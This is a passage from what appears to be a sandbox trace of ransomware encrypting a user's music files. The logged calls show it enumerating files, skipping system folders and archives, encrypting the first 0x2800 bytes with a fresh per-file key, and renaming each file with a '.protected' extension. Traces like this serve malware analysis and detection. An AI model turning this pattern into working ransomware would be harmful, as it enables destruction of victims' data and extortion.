HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\faR8rvBC.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\far8rvbc.wav.protected")) returned 1 [0092.315] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.315] lstrcmpiW (lpString1="k2Qw.m4a", lpString2="Windows") returned -1 [0092.315] lstrcmpiW (lpString1="k2Qw.m4a", lpString2="Program Files") returned -1 [0092.315] lstrcmpiW (lpString1="k2Qw.m4a", lpString2="Program Files (x86)") returned -1 [0092.315] lstrcmpiW (lpString1="k2Qw.m4a", lpString2="$Recycle.bin") returned 1 [0092.315] lstrcmpiW (lpString1="k2Qw.m4a", lpString2="System Volume Information") returned -1 [0092.315] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a") returned 101 [0092.315] StrStrIW (lpFirst="k2Qw.m4a", lpSrch=".protected") returned 0x0 [0092.315] lstrcmpW (lpString1="k2Qw.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0092.316] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.316] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k2qw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a") returned 101 [0092.316] StrStrW (lpFirst="k2Qw.m4a", lpSrch=".txt") returned 0x0 [0092.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a") returned 101 [0092.316] StrStrW (lpFirst="k2Qw.m4a", lpSrch=".rar") returned 0x0 [0092.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a") returned 101 [0092.316] StrStrW (lpFirst="k2Qw.m4a", lpSrch=".zip") returned 0x0 [0092.316] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.317] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.317] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.317] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.317] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.317] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.317] CloseHandle (hObject=0x14c) returned 1 [0092.317] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a.protected") returned 111 [0092.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k2qw.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\k2Qw.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k2qw.m4a.protected")) returned 1 [0092.318] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.318] lstrcmpiW (lpString1="K5AFqd3fkq-1C.wav", lpString2="Windows") returned -1 [0092.318] lstrcmpiW (lpString1="K5AFqd3fkq-1C.wav", lpString2="Program Files") returned -1 [0092.318] lstrcmpiW (lpString1="K5AFqd3fkq-1C.wav", lpString2="Program Files (x86)") returned -1 [0092.318] lstrcmpiW (lpString1="K5AFqd3fkq-1C.wav", lpString2="$Recycle.bin") returned 1 [0092.318] lstrcmpiW (lpString1="K5AFqd3fkq-1C.wav", lpString2="System Volume Information") returned -1 [0092.318] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav") returned 110 [0092.318] StrStrIW (lpFirst="K5AFqd3fkq-1C.wav", lpSrch=".protected") returned 0x0 [0092.318] lstrcmpW (lpString1="K5AFqd3fkq-1C.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.318] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.318] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k5afqd3fkq-1c.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav") returned 110 [0092.318] StrStrW (lpFirst="K5AFqd3fkq-1C.wav", lpSrch=".txt") returned 0x0 [0092.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav") returned 110 [0092.318] StrStrW (lpFirst="K5AFqd3fkq-1C.wav", lpSrch=".rar") returned 0x0 [0092.318] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav") returned 110 [0092.318] StrStrW (lpFirst="K5AFqd3fkq-1C.wav", lpSrch=".zip") returned 0x0 [0092.318] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.319] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.319] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.319] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.319] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.319] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.319] CloseHandle (hObject=0x14c) returned 1 [0092.319] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav.protected") returned 120 [0092.319] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k5afqd3fkq-1c.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K5AFqd3fkq-1C.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k5afqd3fkq-1c.wav.protected")) returned 1 [0092.320] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.320] lstrcmpiW (lpString1="K9R1dM2UixIIQs.wav", lpString2="Windows") returned -1 [0092.320] lstrcmpiW (lpString1="K9R1dM2UixIIQs.wav", lpString2="Program Files") returned -1 [0092.320] lstrcmpiW (lpString1="K9R1dM2UixIIQs.wav", lpString2="Program Files (x86)") returned -1 [0092.320] lstrcmpiW (lpString1="K9R1dM2UixIIQs.wav", lpString2="$Recycle.bin") returned 1 [0092.320] lstrcmpiW (lpString1="K9R1dM2UixIIQs.wav", lpString2="System Volume Information") returned -1 [0092.320] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav") returned 111 [0092.320] StrStrIW (lpFirst="K9R1dM2UixIIQs.wav", lpSrch=".protected") returned 0x0 [0092.320] lstrcmpW (lpString1="K9R1dM2UixIIQs.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.320] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.320] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k9r1dm2uixiiqs.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav") returned 111 [0092.320] StrStrW (lpFirst="K9R1dM2UixIIQs.wav", lpSrch=".txt") returned 0x0 [0092.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav") returned 111 [0092.320] StrStrW (lpFirst="K9R1dM2UixIIQs.wav", lpSrch=".rar") returned 0x0 [0092.320] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav") returned 111 [0092.320] StrStrW (lpFirst="K9R1dM2UixIIQs.wav", lpSrch=".zip") returned 0x0 [0092.320] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.321] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.321] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.321] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.321] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.321] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.321] CloseHandle (hObject=0x14c) returned 1 [0092.321] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav.protected") returned 121 [0092.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k9r1dm2uixiiqs.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\K9R1dM2UixIIQs.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\k9r1dm2uixiiqs.wav.protected")) returned 1 [0092.322] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.322] lstrcmpiW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="Windows") returned -1 [0092.322] lstrcmpiW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="Program Files") returned 1 [0092.322] lstrcmpiW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="Program Files (x86)") returned 1 [0092.322] lstrcmpiW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="$Recycle.bin") returned 1 [0092.322] lstrcmpiW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="System Volume Information") returned -1 [0092.322] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3") returned 117 [0092.322] StrStrIW (lpFirst="S Nq5OB_b-42i_Sdcx8J.mp3", lpSrch=".protected") returned 0x0 [0092.322] lstrcmpW (lpString1="S Nq5OB_b-42i_Sdcx8J.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0092.322] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.322] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\s nq5ob_b-42i_sdcx8j.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3") returned 117 [0092.331] StrStrW (lpFirst="S Nq5OB_b-42i_Sdcx8J.mp3", lpSrch=".txt") returned 0x0 [0092.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3") returned 117 [0092.331] StrStrW (lpFirst="S Nq5OB_b-42i_Sdcx8J.mp3", lpSrch=".rar") returned 0x0 [0092.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3") returned 117 [0092.331] StrStrW (lpFirst="S Nq5OB_b-42i_Sdcx8J.mp3", lpSrch=".zip") returned 0x0 [0092.331] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.332] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.332] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.332] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.332] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.332] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.332] CloseHandle (hObject=0x14c) returned 1 [0092.332] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3.protected") returned 127 [0092.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\s nq5ob_b-42i_sdcx8j.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\S Nq5OB_b-42i_Sdcx8J.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\s nq5ob_b-42i_sdcx8j.mp3.protected")) returned 1 [0092.333] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.333] lstrcmpiW (lpString1="zkg0KJsW3g9.wav", lpString2="Windows") returned 1 [0092.333] lstrcmpiW (lpString1="zkg0KJsW3g9.wav", lpString2="Program Files") returned 1 [0092.333] lstrcmpiW (lpString1="zkg0KJsW3g9.wav", lpString2="Program Files (x86)") returned 1 [0092.333] lstrcmpiW (lpString1="zkg0KJsW3g9.wav", lpString2="$Recycle.bin") returned 1 [0092.333] lstrcmpiW (lpString1="zkg0KJsW3g9.wav", lpString2="System Volume Information") returned 1 [0092.333] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav") returned 108 [0092.333] StrStrIW (lpFirst="zkg0KJsW3g9.wav", lpSrch=".protected") returned 0x0 [0092.333] lstrcmpW (lpString1="zkg0KJsW3g9.wav", lpString2="RESTORE_FILES.txt") returned 1 [0092.333] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.333] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\zkg0kjsw3g9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav") returned 108 [0092.334] StrStrW (lpFirst="zkg0KJsW3g9.wav", lpSrch=".txt") returned 0x0 [0092.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav") returned 108 [0092.334] StrStrW (lpFirst="zkg0KJsW3g9.wav", lpSrch=".rar") returned 0x0 [0092.334] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\zkg0KJsW3g9.wav") returned 108 [0092.334] StrStrW (lpFirst="zkg0KJsW3g9.wav", lpSrch=".zip") returned 0x0 [0092.334] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.334] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.334] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.335] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.335] WriteFile (in: hFile=0x14c, 